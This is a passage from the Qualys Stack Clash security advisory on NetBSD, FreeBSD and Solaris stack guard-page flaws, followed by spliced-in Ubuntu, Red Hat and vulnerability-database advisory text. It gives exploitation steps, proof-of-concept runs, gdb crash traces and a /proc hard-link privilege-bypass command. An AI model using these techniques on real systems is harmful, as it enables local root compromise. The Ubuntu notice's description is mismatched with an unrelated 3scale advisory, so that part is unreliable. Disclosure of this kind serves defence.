$ sh -c 'ulimit -S -s ulimit -H -s; pmap -a -P'
Start End Size Offset rwxpc RWX I/W/A Dev Inode - File
08048000-0804dfff 24k 00000000 r-xp+ (rwx) 1/0/0 00:00 21706 - /usr/bin/pmap [0xc5c8f0b8]
...
bbbee000-bbbfefff 68k 00000000 r-xp+ (rwx) 1/0/0 00:00 107525 - /libexec/ld.elf_so [0xc535f580]
bbbff000-bbbfffff 4k 00000000 rw-p- (rwx) 1/0/0 00:00 0 - [ anon ]
bbc00000-bfbeffff 65472k 00000000 rw-p+ (rwx) 1/0/0 00:00 0 - [ stack ]
bfbf0000-bfbfffff 64k 00000000 rw-p- (rwx) 1/0/0 00:00 0 - [ stack ]
total 73016k
cp /usr/bin/pmap .
paxctl +A ./pmap
sh -c 'ulimit -S -s ulimit -H -s; ./pmap -a -P'
Start End Size Offset rwxpc RWX I/W/A Dev Inode - File 08048000-0804dfff 24k 00000000 r-xp+ (rwx) 1/0/0 00:00 172149 - /tmp/pmap [0xc5cb3c64] ... bbbee000-bbbfefff 68k 00000000 r-xp+ (rwx) 1/0/0 00:00 107525 - /libexec/ld.elf_so [0xc535f580] bbbff000-bbbfffff 4k 00000000 rw-p- (rwx) 1/0/0 00:00 0 - [ anon ] bbc00000-bf1bffff 55040k 00000000 rw-p+ (rwx) 1/0/0 00:00 0 - [ stack ] bf1c0000-bf1cefff 60k 00000000 rw-p- (rwx) 1/0/0 00:00 0 - [ stack ] total 62580k
Consequently, a local attacker can set RLIMIT_STACK to MAXSSIZ, eliminate the stack guard-page, and:
-
skip Step 1, because ld.so's read-write segment is naturally mapped directly below the stack region;
-
Steps 2 and 3: consume 64MB (MAXSSIZ) of stack memory (for example, through the recursive qsort() vulnerability, CVE-2017-1000378) until the stack-pointer reaches the start of the stack region (Step 2) and moves into ld.so's read-write segment (Step 3);
-
Step 4b: smash ld.so's read-write segment with the stack.
We did not try to exploit this vulnerability, nor did we search for a vulnerable SUID or SGID binary, but we wrote a simple proof-of-concept, and some of the following crashes may be exploitable:
$ sh -c 'ulimit -S -s ulimit -H -s; ./NetBSD_CVE-2017-1000375 0x04000000'
[1] Segmentation fault ./NetBSD_CVE-201...
$ sh -c 'ulimit -S -s ulimit -H -s; ./NetBSD_CVE-2017-1000375 0x03000000'
...
$ sh -c 'ulimit -S -s ulimit -H -s; ./NetBSD_CVE-2017-1000375 0x03ec5000'
$ sh -c 'ulimit -S -s ulimit -H -s; ./NetBSD_CVE-2017-1000375 0x03ec5400'
[1] Segmentation fault ./NetBSD_CVE-201...
$ sh -c 'ulimit -S -s ulimit -H -s; gdb ./NetBSD_CVE-2017-1000375'
GNU gdb (GDB) 7.7.1
...
(gdb) run 0x03ec5400
Program received signal SIGSEGV, Segmentation fault.
0xbbbf448d in _rtld_symlook_default () from /usr/libexec/ld.elf_so
(gdb) x/i $eip
=> 0xbbbf448d <_rtld_symlook_default+185>: mov %edx,(%esi,%edi,4)
(gdb) info registers
esi 0xbabae890 -1162155888
edi 0x0 0
...
(gdb) run 0x03ec5800
Program received signal SIGSEGV, Segmentation fault.
0xbbbf4465 in _rtld_symlook_default () from /usr/libexec/ld.elf_so
(gdb) x/i $eip
=> 0xbbbf4465 <_rtld_symlook_default+145>: mov 0x4(%ecx),%edx
(gdb) info registers
ecx 0x41414141 1094795585
...
(gdb) run 0x03ec5c00
Program received signal SIGSEGV, Segmentation fault.
0xbbbf4408 in _rtld_symlook_default () from /usr/libexec/ld.elf_so
(gdb) x/i $eip
=> 0xbbbf4408 <_rtld_symlook_default+52>: mov (%eax),%esi
(gdb) info registers
eax 0x41414141 1094795585
...
======================================================================== IV.4. FreeBSD ========================================================================
======================================================================== IV.4.1. setrlimit() RLIMIT_STACK vulnerability (CVE-2017-1085) ========================================================================
FreeBSD's kern_proc_setrlimit() function contains the following comment and code:
/*
* Stack is allocated to the max at exec time with only
* "rlim_cur" bytes accessible. If stack limit is going
* up make more accessible, if going down make inaccessible.
*/
if (limp->rlim_cur != oldssiz.rlim_cur) {
...
if (limp->rlim_cur > oldssiz.rlim_cur) {
prot = p->p_sysent->sv_stackprot;
size = limp->rlim_cur - oldssiz.rlim_cur;
addr = p->p_sysent->sv_usrstack -
limp->rlim_cur;
} else {
prot = VM_PROT_NONE;
size = oldssiz.rlim_cur - limp->rlim_cur;
addr = p->p_sysent->sv_usrstack -
oldssiz.rlim_cur;
}
...
(void)vm_map_protect(&p->p_vmspace->vm_map,
addr, addr + size, prot, FALSE);
}
OpenBSD's and NetBSD's dosetrlimit() function contains the same comment, which accurately describes the layout of their user-space stack region. Unfortunately, FreeBSD's kern_proc_setrlimit() comment and code are incorrect, as hinted at in exec_new_vmspace():
/ * Destroy old address space, and allocate a new stack * The new stack is only SGROWSIZ large because it is grown * automatically in trap.c. /
and vm_map_stack_locked():
/*
* We initially map a stack of only init_ssize. We will grow as
* needed later.
where init_ssize is SGROWSIZ (128KB), not MAXSSIZ (64MB on i386), because "init_ssize = (max_ssize < growsize) ? max_ssize : growsize;" (and max_ssize is MAXSSIZ, and growsize is SGROWSIZ).
As a result, if a program calls setrlimit() to increase RLIMIT_STACK, vm_map_protect() may turn a read-only memory region below the stack into a read-write region (CVE-2017-1085), as demonstrated by the following proof-of-concept:
% ./FreeBSD_CVE-2017-1085 Segmentation fault
% ./FreeBSD_CVE-2017-1085 setrlimit to the max char at 0xbd155000: 41
======================================================================== IV.4.2. Stack guard-page disabled by default (CVE-2017-1083) ========================================================================
The FreeBSD kernel implements a 4KB stack guard-page, and recent versions of the FreeBSD Installer offer it as a system hardening option. Unfortunately, it is disabled by default (CVE-2017-1083):
% sysctl security.bsd.stack_guard_page security.bsd.stack_guard_page: 0
======================================================================== IV.4.3. Stack guard-page vulnerabilities (CVE-2017-1084) ========================================================================
- If FreeBSD's stack guard-page is enabled, its entire logic is implemented in vm_map_growstack(): this function guarantees a minimum distance of 4KB (the stack guard-page) between the start of the stack and the end of the memory region that is mapped below (but the stack guard-page is not physically mapped into the address-space).
Unfortunately, this guarantee is given only when the stack grows down and clashes with the memory region mapped below, but not if the memory region mapped below grows up and clashes with the stack: this vulnerability effectively eliminates the stack guard-page (CVE-2017-1084). In our proof-of-concept:
. we allocate anonymous mmap()s of 4KB, until the end of an anonymous mmap() reaches the start of the stack [Step 1];
. we call a recursive function until the stack-pointer reaches the start of the stack and moves into the anonymous mmap() directly below [Step 2];
. but we do not jump over the stack guard-page, because each call to the recursive function allocates (and fully writes to) a 1KB stack-based buffer [Step 3];
. and we do not crash into the stack guard-page, because CVE-2017-1084 has effectively eliminated the stack guard-page in Step 1.
sysctl security.bsd.stack_guard_page=1
security.bsd.stack_guard_page: 0 -> 1
% ./FreeBSD_CVE-2017-FGPU char at 0xbfbde000: 41
- vm_map_growstack() implements most of the stack guard-page logic in
the following code:
/* * Growing downward. */ /* Get the preliminary new entry start value */ addr = stack_entry->start - grow_amount; /* * If this puts us into the previous entry, cut back our * growth to the available space. Also, see the note above. */ if (addr < end) { stack_entry->avail_ssize = max_grow; addr = end; if (stack_guard_page) addr += PAGE_SIZE; }
where:
. addr is the new start of the stack;
. stack_entry->start is the old start of the stack;
. grow_amount is the size of the stack expansion;
. end is the end of the memory region below the stack.
Unfortunately, the "addr < end" test should be "addr <= end": if addr, the new start of the stack, is equal to end, the end of the memory region mapped below, then the stack guard-page is eliminated (CVE-2017-1084). In our proof-of-concept:
. we allocate anonymous mmap()s of 4KB, until the end of an anonymous mmap() reaches a randomly chosen distance below the start of the stack [Step 1];
. we call a recursive function until the stack-pointer reaches the start of the stack, and the stack expansion reaches the end of the anonymous mmap() below [Step 2];
. we do not jump over the stack guard-page, because each call to the recursive function allocates (and fully writes to) a 1KB stack-based buffer [Step 3];
. and we crash into the stack guard-page most of the time;
. but we survive with a probability of 4KB/128KB=1/32 (grow_amount is always a multiple of SGROWSIZ, 128KB) because CVE-2017-1084 has effectively eliminated the stack guard-page in Step 2.
% sysctl security.bsd.stack_guard_page security.bsd.stack_guard_page: 1
% sh -c 'while true; do ./FreeBSD_CVE-2017-FGPE; done' Segmentation fault char at 0xbe45e000: 41; final dist 6097 (24778705) Segmentation fault Segmentation fault Segmentation fault ... Segmentation fault Segmentation fault Segmentation fault char at 0xbd25e000: 41; final dist 7036 (43654012) Segmentation fault Segmentation fault Segmentation fault ... Segmentation fault Segmentation fault Segmentation fault char at 0xbd29e000: 41; final dist 5331 (43390163) Segmentation fault Segmentation fault Segmentation fault ...
In contrast, if FreeBSD's stack guard-page is disabled, our proof-of-concept always survives:
sysctl security.bsd.stack_guard_page=0
security.bsd.stack_guard_page: 1 -> 0
% sh -c 'while true; do ./FreeBSD_CVE-2017-FGPE; done' char at 0xbe969000: 41; final dist 89894 (19488550) char at 0xbfa6d000: 41; final dist 74525 (1647389) char at 0xbf4df000: 41; final dist 78 (7471182) char at 0xbe9e4000: 41; final dist 112397 (18986765) char at 0xbf693000: 41; final dist 49811 (5685907) char at 0xbf533000: 41; final dist 51037 (7128925) char at 0xbd799000: 41; final dist 26043 (38167995) char at 0xbd54b000: 11; final dist 83754 (40585002) char at 0xbe176000: 41; final dist 36992 (27824256) char at 0xbfa91000: 41; final dist 57449 (1499241) char at 0xbd1b9000: 41; final dist 26115 (44328451) char at 0xbd1c8000: 41; final dist 94852 (44266116) char at 0xbf73a000: 41; final dist 22276 (5003012) char at 0xbe6b1000: 41; final dist 58854 (22341094) char at 0xbeb81000: 41; final dist 124727 (17295159) char at 0xbfb35000: 41; final dist 43174 (829606) ...
- FreeBSD's thread library (libthr) mmap()s a secondary PROT_NONE stack guard-page at a distance RLIMIT_STACK below the end of the stack:
sysctl security.bsd.stack_guard_page=1
security.bsd.stack_guard_page: 0 -> 1
% sh -c 'exec procstat -v $$' PID START END PRT RES PRES REF SHD FLAG TP PATH 2779 0x8048000 0x8050000 r-x 8 8 1 0 CN-- vn /usr/bin/procstat ... 2779 0x28400000 0x28800000 rw- 22 35 2 0 ---- df 2779 0xbfbdf000 0xbfbff000 rwx 3 3 1 0 ---D df 2779 0xbfbff000 0xbfc00000 r-x 1 1 23 0 ---- ph
% sh -c 'LD_PRELOAD=libthr.so exec procstat -v $$' PID START END PRT RES PRES REF SHD FLAG TP PATH 2798 0x8048000 0x8050000 r-x 8 8 1 0 CN-- vn /usr/bin/procstat ... 2798 0x28400000 0x28800000 rw- 23 35 2 0 ---- df 2798 0xbbbfe000 0xbbbff000 --- 0 0 0 0 ---- -- 2798 0xbfbdf000 0xbfbff000 rwx 3 3 1 0 ---D df 2798 0xbfbff000 0xbfc00000 r-x 1 1 23 0 ---- ph
Unfortunately, this secondary stack guard-page does not mitigate the vulnerabilities that we discovered in FreeBSD's stack guard-page implementation:
% sysctl security.bsd.stack_guard_page security.bsd.stack_guard_page: 1
% sh -c 'LD_PRELOAD=libthr.so ./FreeBSD_CVE-2017-FGPU' char at 0xbfbde000: 41
% sh -c 'while true; do LD_PRELOAD=libthr.so ./FreeBSD_CVE-2017-FGPE; done' Segmentation fault Segmentation fault Segmentation fault ... Segmentation fault Segmentation fault Segmentation fault char at 0xbda5e000: 41; final dist 3839 (35262207) Segmentation fault Segmentation fault Segmentation fault ... Segmentation fault Segmentation fault Segmentation fault char at 0xbdb1e000: 41; final dist 3549 (34475485) Segmentation fault Segmentation fault Segmentation fault ...
======================================================================== IV.4.4. Remote exploitation ========================================================================
Because FreeBSD's stack guard-page is disabled by default, we tried (and failed) to remotely exploit a test service vulnerable to:
-
an unlimited memory leak that allows us to malloc()ate gigabytes of memory;
-
a limited recursion that allows us to allocate up to 1MB of stack memory.
FreeBSD's malloc() implementation (jemalloc) mmap()s 4MB chunks of anonymous memory that are aligned on multiples of 4MB. The first 4MB mmap() chunk starts at 0x28400000, and the last 4MB mmap() chunk ends at 0xbf800000, because the stack itself already ends at 0xbfc00000; but it is impossible to cover this final mmap-stack distance (almost 4MB) with the limited recursion (1MB) of our test service. break(0x80499b0) = 0 (0x0) break(0x8400000) = 0 (0x0) mmap(0x0,4194304,PROT_READ|PROT_WRITE,MAP_PRIVATE|MAP_ANON,-1,0x0) = 672845824 (0x281ad000) mmap(0x285ad000,2437120,PROT_READ|PROT_WRITE,MAP_PRIVATE|MAP_ANON,-1,0x0) = 677040128 (0x285ad000) munmap(0x281ad000,2437120) = 0 (0x0) mmap(0x0,8388608,PROT_READ|PROT_WRITE,MAP_PRIVATE|MAP_ANON,-1,0x0) = 679477248 (0x28800000) munmap(0x28c00000,4194304) = 0 (0x0) mmap(0x0,4194304,PROT_READ|PROT_WRITE,MAP_PRIVATE|MAP_ANON,-1,0x0) = 683671552 (0x28c00000) mmap(0x0,4194304,PROT_READ|PROT_WRITE,MAP_PRIVATE|MAP_ANON,-1,0x0) = 687865856 (0x29000000) mmap(0x0,4194304,PROT_READ|PROT_WRITE,MAP_PRIVATE|MAP_ANON,-1,0x0) = 692060160 (0x29400000) mmap(0x0,4194304,PROT_READ|PROT_WRITE,MAP_PRIVATE|MAP_ANON,-1,0x0) = 696254464 (0x29800000) mmap(0x0,4194304,PROT_READ|PROT_WRITE,MAP_PRIVATE|MAP_ANON,-1,0x0) = 700448768 (0x29c00000) ... mmap(0x0,4194304,PROT_READ|PROT_WRITE,MAP_PRIVATE|MAP_ANON,-1,0x0) = -1103101952 (0xbe400000) mmap(0x0,4194304,PROT_READ|PROT_WRITE,MAP_PRIVATE|MAP_ANON,-1,0x0) = -1098907648 (0xbe800000) mmap(0x0,4194304,PROT_READ|PROT_WRITE,MAP_PRIVATE|MAP_ANON,-1,0x0) = -1094713344 (0xbec00000) mmap(0x0,4194304,PROT_READ|PROT_WRITE,MAP_PRIVATE|MAP_ANON,-1,0x0) = -1090519040 (0xbf000000) mmap(0x0,4194304,PROT_READ|PROT_WRITE,MAP_PRIVATE|MAP_ANON,-1,0x0) = -1086324736 (0xbf400000) mmap(0x0,4194304,PROT_READ|PROT_WRITE,MAP_PRIVATE|MAP_ANON,-1,0x0) ERR#12 'Cannot allocate memory' break(0x8800000) = 0 (0x0) mmap(0x0,4194304,PROT_READ|PROT_WRITE,MAP_PRIVATE|MAP_ANON,-1,0x0) ERR#12 'Cannot allocate memory' break(0x8c00000) = 0 (0x0) mmap(0x0,4194304,PROT_READ|PROT_WRITE,MAP_PRIVATE|MAP_ANON,-1,0x0) ERR#12 'Cannot allocate memory' break(0x9000000) = 0 (0x0) ... mmap(0x0,4194304,PROT_READ|PROT_WRITE,MAP_PRIVATE|MAP_ANON,-1,0x0) ERR#12 'Cannot allocate memory' break(0x27c00000) = 0 (0x0) mmap(0x0,4194304,PROT_READ|PROT_WRITE,MAP_PRIVATE|MAP_ANON,-1,0x0) ERR#12 'Cannot allocate memory' break(0x28000000) = 0 (0x0) mmap(0x0,4194304,PROT_READ|PROT_WRITE,MAP_PRIVATE|MAP_ANON,-1,0x0) ERR#12 'Cannot allocate memory' break(0x28400000) ERR#12 'Cannot allocate memory'
======================================================================== IV.5. Solaris >= 11.1 ========================================================================
======================================================================== IV.5.1. Minimal RLIMIT_STACK vulnerability (CVE-2017-3630) ========================================================================
On Solaris, ASLR can be enabled or disabled for each ELF binary with the SUNW_ASLR dynamic section entry (man elfedit):
$ elfdump /usr/bin/rsh | egrep 'ASLR|NX' [39] SUNW_ASLR 0x2 ENABLE [40] SUNW_NXHEAP 0x2 ENABLE [41] SUNW_NXSTACK 0x2 ENABLE
Without ASLR
If ASLR is disabled:
-
a stack region of size RLIMIT_STACK is reserved in the address-space;
-
a 4KB stack guard-page is mapped directly below this stack region;
-
the runtime linker ld.so is mapped directly below this stack guard-page.
$ cp /usr/bin/sleep . $ chmod u+w ./sleep $ elfedit -e 'dyn:sunw_aslr disable' ./sleep
$ sh -c 'ulimit -S -s; ./sleep 3 & pmap -r ${!}' 8192 7176: ./sleep 3 ... FE7B1000 228K r-x---- /lib/ld.so.1 FE7FA000 8K rwx---- /lib/ld.so.1 FE7FC000 8K rwx---- /lib/ld.so.1 FE7FF000 8192K rw----- [ stack ] total 17148K
$ sh -c 'ulimit -S -s 64; ./sleep 3 & pmap -r ${!}' 7244: ./sleep 3 ... FEFA1000 228K r-x---- /lib/ld.so.1 FEFEA000 8K rwx---- /lib/ld.so.1 FEFEC000 8K rwx---- /lib/ld.so.1 FEFEF000 64K rw----- [ stack ] total 9020K
On the one hand, a local attacker can exploit this simplified stack-clash:
-
Step 1 (Clash) is not needed, because ld.so is naturally mapped directly below the stack (the distance between the end of ld.so's read-write segment and the start of the stack is 4KB, the stack guard-page);
-
Step 2 (Run) is not needed, because a local attacker can set RLIMIT_STACK to just a few kilobytes, reserve a very small stack region, and hence shorten the distance between the stack-pointer and the start of the stack (and the end of ld.so's read-write segment);
-
Step 3 (Jump) can be completed with a large stack-based buffer that is not fully written to;
-
Step 4b (Smash) can be completed by overwriting the function pointers in ld.so's read-write segment with the contents of a stack-based buffer.
Such a simplified stack-clash exploit was first mentioned in Gael Delalleau's 2005 presentation (slide 30).
On the other hand, a remote attacker cannot modify RLIMIT_STACK and must complete Step 2 (Run) with a recursive function that consumes the 8MB (the default RLIMIT_STACK) between the stack-pointer and the start of the stack.
With ASLR
If ASLR is enabled:
-
a stack region of size RLIMIT_STACK is reserved in the address-space;
-
a 4KB stack guard-page is mapped directly below this stack region;
-
the runtime linker ld.so is mapped below this stack guard-page, but at a random distance (within a [4KB,128MB] range) -- effectively a large, secondary stack guard-page.
On the one hand, a local attacker can run the simplified "Without ASLR" stack-clash exploit until the ld.so-stack distance is minimal -- with a probability of 4KB/128MB=1/32K, the distance between the end of ld.so's read-write segment and the start of the stack is exactly 8KB: the stack guard-page plus the minimum distance between the stack guard-page and ld.so (CVE-2017-3629).
On the other hand, a remote attacker must complete Step 2 (Run) with a recursive function, and:
-
has a good chance of exploiting this stack-clash after 32K connections (when the ld.so-stack distance is minimal) if the remote service re-execve()s (re-randomizes the ld.so-stack distance for each new connection);
-
cannot exploit this stack-clash if the remote service does not re-execve() (does not re-randomize the ld.so-stack distance for each new connection) unless the attacker is able to restart the service, reboot the server, or target a 32K-server farm.
======================================================================== IV.5.2. /usr/bin/rsh exploit ========================================================================
/usr/bin/rsh is SUID-root and its main() function allocates a 50KB stack-based buffer that is not written to and can be used to jump over the stack guard-page, into ld.so's read-write segment, in Step 3 of our simplified stack-clash exploit.
Next, we discovered a general method for gaining eip control in Step 4b: setlocale(LC_ALL, ""), called by the main() function of /usr/bin/rsh and other SUID binaries, copies the LC_ALL environment variable to several stack-based buffers and thus smashes ld.so's read-write segment and overwrites some of ld.so's function pointers.
Last, we execute our own shell-code: we return-into-binary (/usr/bin/rsh is not a PIE), to an instruction that reliably jumps into a copy of our LC_ALL environment variable in ld.so's read-write segment, which is in fact read-write-executable. For example, after we gain control of eip:
-
on Solaris 11.1, we return to a "pop; pop; ret" instruction, because a pointer to our shell-code is stored at an 8-byte offset from esp;
-
on Solaris 11.3, we return to a "call *0xc(%ebp)" instruction, because a pointer to our shell-code is stored at a 12-byte offset from ebp.
Our Solaris exploit brute-forces the random ld.so-stack distance and two parameters:
-
the RLIMIT_STACK;
-
the length of the LC_ALL environment variable.
======================================================================== IV.5.3. Forced-Privilege vulnerability (CVE-2017-3631) ========================================================================
/usr/bin/rsh is SUID-root, but the shell that we obtained in Step 4b of our stack-clash exploit did not grant us full root privileges, only net_privaddr, the privilege to bind to a privileged port number. Disappointed by this result, we investigated and found:
$ ggrep -r /usr/bin/rsh /etc 2>/dev/null /etc/security/exec_attr.d/core-os:Forced Privilege:solaris:cmd:RO::/usr/bin/rsh:privs=net_privaddr
$ /usr/bin/rsh -h /usr/bin/rsh: illegal option -- h usage: rsh [ -PN / -PO ] [ -l login ] [ -n ] [ -k realm ] [ -a ] [ -x ] [ -f / -F ] host command rsh [ -PN / -PO ] [ -l login ] [ -k realm ] [ -a ] [ -x ] [ -f / -F ] host
cat truss.out
... 7319: execve("/usr/bin/rsh", 0xA9479C548, 0xA94792808) argc = 2 7319: *** FPRIV: P/E: net_privaddr *** ...
Unfortunately, this Forced-Privilege protection is based on the pathname of SUID-root binaries, which can be execve()d through hard-links, under different pathnames (CVE-2017-3631). For example, we discovered that readable SUID-root binaries can be execve()d through hard-links in /proc:
$ sleep 3 < /usr/bin/rsh & /proc/${!}/fd/0 -h [1] 7333 /proc/7333/fd/0: illegal option -- h usage: rsh [ -PN / -PO ] [ -l login ] [ -n ] [ -k realm ] [ -a ] [ -x ] [ -f / -F ] host command rsh [ -PN / -PO ] [ -l login ] [ -k realm ] [ -a ] [ -x ] [ -f / -F ] host
cat truss.out
... 7335: execve("/proc/7333/fd/0", 0xA947CA508, 0xA94792808) argc = 2 7335: *** SUID: ruid/euid/suid = 100 / 0 / 0 *** ...
This vulnerability allows us to bypass the Forced-Privilege protection and obtain full root privileges with our /usr/bin/rsh exploit.
======================================================================== V. Acknowledgments ========================================================================
We thank the members of the distros list, Oracle/Solaris, Exim, Sudo, security@kernel.org, grsecurity/PaX, and OpenBSD. ========================================================================== Ubuntu Security Notice USN-3323-2 June 29, 2017
eglibc vulnerability
A security issue affects these releases of Ubuntu and its derivatives:
- Ubuntu 12.04 ESM
Summary:
Gnu C library could be made to run programs as an administrator. This update provides the corresponding update for Ubuntu 12.04 ESM.
Update instructions:
The problem can be corrected by updating your system to the following package versions:
Ubuntu 12.04 ESM: libc6 2.15-0ubuntu10.20
After a standard system update you need to reboot your computer to make all the necessary changes. Description:
Red Hat 3scale API Management Platform 2.0 is a platform for the management of access and traffic for web-based APIs across a variety of deployment options.
Security Fix(es):
- It was found that RH-3scale AMP would permit creation of an access token without a client secret. An attacker could use this flaw to circumvent authentication controls and gain access to restricted APIs. (CVE-2017-7512)
The underlying container image was also rebuilt to resolve other security issues. Solution:
To apply this security fix, use the updated docker images. Bugs fixed (https://bugzilla.redhat.com/):
1457997 - CVE-2017-7512 3scale AMP: validation bypass in oauth
5
Show details on source website{
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"id": "JVNDB-2017-005209"
},
{
"db": "NVD",
"id": "CVE-2017-1000366"
}
]
},
"description": {
"_id": null,
"data": "glibc contains a vulnerability that allows specially crafted LD_LIBRARY_PATH values to manipulate the heap/stack, causing them to alias, potentially resulting in arbitrary code execution. Please note that additional hardening changes have been made to glibc to prevent manipulation of stack and heap memory but these issues are not directly exploitable, as such they have not been given a CVE. This affects glibc 2.25 and earlier. glibc Contains a buffer error vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. GNU glibc is prone to local memory-corruption vulnerability. \nAn attacker could exploit this issue to execute arbitrary code in the context of the application. \nGNU glibc 2.25 and prior versions are vulnerable. \n-----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA1\n\n=====================================================================\n Red Hat Security Advisory\n\nSynopsis: Important: glibc security update\nAdvisory ID: RHSA-2017:1479-01\nProduct: Red Hat Enterprise Linux\nAdvisory URL: https://access.redhat.com/errata/RHSA-2017:1479\nIssue date: 2017-06-19\nCVE Names: CVE-2017-1000366 \n=====================================================================\n\n1. Summary:\n\nAn update for glibc is now available for Red Hat Enterprise Linux 5\nExtended Lifecycle Support, Red Hat Enterprise Linux 5.9 Long Life, Red Hat\nEnterprise Linux 6.2 Advanced Update Support, Red Hat Enterprise Linux 6.4\nAdvanced Update Support, Red Hat Enterprise Linux 6.5 Advanced Update\nSupport, Red Hat Enterprise Linux 6.5 Telco Extended Update Support, Red\nHat Enterprise Linux 6.6 Advanced Update Support, Red Hat Enterprise Linux\n6.6 Telco Extended Update Support, Red Hat Enterprise Linux 6.7 Extended\nUpdate Support, and Red Hat Enterprise Linux 7.2 Extended Update Support. \n\nRed Hat Product Security has rated this update as having a security impact\nof Important. A Common Vulnerability Scoring System (CVSS) base score,\nwhich gives a detailed severity rating, is available for each vulnerability\nfrom the CVE link(s) in the References section. \n\n2. Relevant releases/architectures:\n\nRed Hat Enterprise Linux ComputeNode EUS (v. 7.2) - x86_64\nRed Hat Enterprise Linux ComputeNode Optional EUS (v. 7.2) - x86_64\nRed Hat Enterprise Linux HPC Node EUS (v. 6.7) - x86_64\nRed Hat Enterprise Linux HPC Node Optional EUS (v. 6.7) - x86_64\nRed Hat Enterprise Linux Long Life (v. 5.9 server) - i386, ia64, x86_64\nRed Hat Enterprise Linux Server (v. 5 ELS) - i386, s390x, x86_64\nRed Hat Enterprise Linux Server AUS (v. 6.2) - x86_64\nRed Hat Enterprise Linux Server AUS (v. 6.4) - x86_64\nRed Hat Enterprise Linux Server AUS (v. 6.5) - x86_64\nRed Hat Enterprise Linux Server AUS (v. 6.6) - x86_64\nRed Hat Enterprise Linux Server EUS (v. 6.7) - i386, ppc64, s390x, x86_64\nRed Hat Enterprise Linux Server EUS (v. 7.2) - ppc64, ppc64le, s390x, x86_64\nRed Hat Enterprise Linux Server Optional AUS (v. 6.2) - x86_64\nRed Hat Enterprise Linux Server Optional AUS (v. 6.4) - x86_64\nRed Hat Enterprise Linux Server Optional AUS (v. 6.5) - x86_64\nRed Hat Enterprise Linux Server Optional AUS (v. 6.6) - x86_64\nRed Hat Enterprise Linux Server Optional EUS (v. 6.7) - i386, ppc64, s390x, x86_64\nRed Hat Enterprise Linux Server Optional EUS (v. 7.2) - ppc64, ppc64le, s390x, x86_64\nRed Hat Enterprise Linux Server Optional TUS (v. 6.5) - x86_64\nRed Hat Enterprise Linux Server Optional TUS (v. 6.6) - x86_64\nRed Hat Enterprise Linux Server TUS (v. 6.5) - x86_64\nRed Hat Enterprise Linux Server TUS (v. 6.6) - x86_64\n\n3. Description:\n\nThe glibc packages provide the standard C libraries (libc), POSIX thread\nlibraries (libpthread), standard math libraries (libm), and the name\nservice cache daemon (nscd) used by multiple programs on the system. \nWithout these libraries, the Linux system cannot function correctly. This is glibc-side mitigation which blocks\nprocessing of LD_LIBRARY_PATH for programs running in secure-execution mode\nand reduces the number of allocations performed by the processing of\nLD_AUDIT, LD_PRELOAD, and LD_HWCAP_MASK, making successful exploitation of\nthis issue more difficult. (CVE-2017-1000366)\n\nRed Hat would like to thank Qualys Research Labs for reporting this issue. \n\n4. Solution:\n\nFor details on how to apply this update, which includes the changes\ndescribed in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258\n\nFor the update to take effect, all services linked to the glibc library\nmust be restarted, or the system rebooted. \n\n5. Bugs fixed (https://bugzilla.redhat.com/):\n\n1452543 - CVE-2017-1000366 glibc: heap/stack gap jumping via unbounded stack allocations\n\n6. Package List:\n\nRed Hat Enterprise Linux Long Life (v. 5.9 server):\n\nSource:\nglibc-2.5-107.el5_9.9.src.rpm\n\ni386:\nglibc-2.5-107.el5_9.9.i386.rpm\nglibc-2.5-107.el5_9.9.i686.rpm\nglibc-common-2.5-107.el5_9.9.i386.rpm\nglibc-debuginfo-2.5-107.el5_9.9.i386.rpm\nglibc-debuginfo-2.5-107.el5_9.9.i686.rpm\nglibc-debuginfo-common-2.5-107.el5_9.9.i386.rpm\nglibc-devel-2.5-107.el5_9.9.i386.rpm\nglibc-headers-2.5-107.el5_9.9.i386.rpm\nglibc-utils-2.5-107.el5_9.9.i386.rpm\nnscd-2.5-107.el5_9.9.i386.rpm\n\nia64:\nglibc-2.5-107.el5_9.9.i686.rpm\nglibc-2.5-107.el5_9.9.ia64.rpm\nglibc-common-2.5-107.el5_9.9.ia64.rpm\nglibc-debuginfo-2.5-107.el5_9.9.i686.rpm\nglibc-debuginfo-2.5-107.el5_9.9.ia64.rpm\nglibc-debuginfo-common-2.5-107.el5_9.9.i386.rpm\nglibc-devel-2.5-107.el5_9.9.ia64.rpm\nglibc-headers-2.5-107.el5_9.9.ia64.rpm\nglibc-utils-2.5-107.el5_9.9.ia64.rpm\nnscd-2.5-107.el5_9.9.ia64.rpm\n\nx86_64:\nglibc-2.5-107.el5_9.9.i686.rpm\nglibc-2.5-107.el5_9.9.x86_64.rpm\nglibc-common-2.5-107.el5_9.9.x86_64.rpm\nglibc-debuginfo-2.5-107.el5_9.9.i386.rpm\nglibc-debuginfo-2.5-107.el5_9.9.i686.rpm\nglibc-debuginfo-2.5-107.el5_9.9.x86_64.rpm\nglibc-debuginfo-common-2.5-107.el5_9.9.i386.rpm\nglibc-devel-2.5-107.el5_9.9.i386.rpm\nglibc-devel-2.5-107.el5_9.9.x86_64.rpm\nglibc-headers-2.5-107.el5_9.9.x86_64.rpm\nglibc-utils-2.5-107.el5_9.9.x86_64.rpm\nnscd-2.5-107.el5_9.9.x86_64.rpm\n\nRed Hat Enterprise Linux Server (v. 5 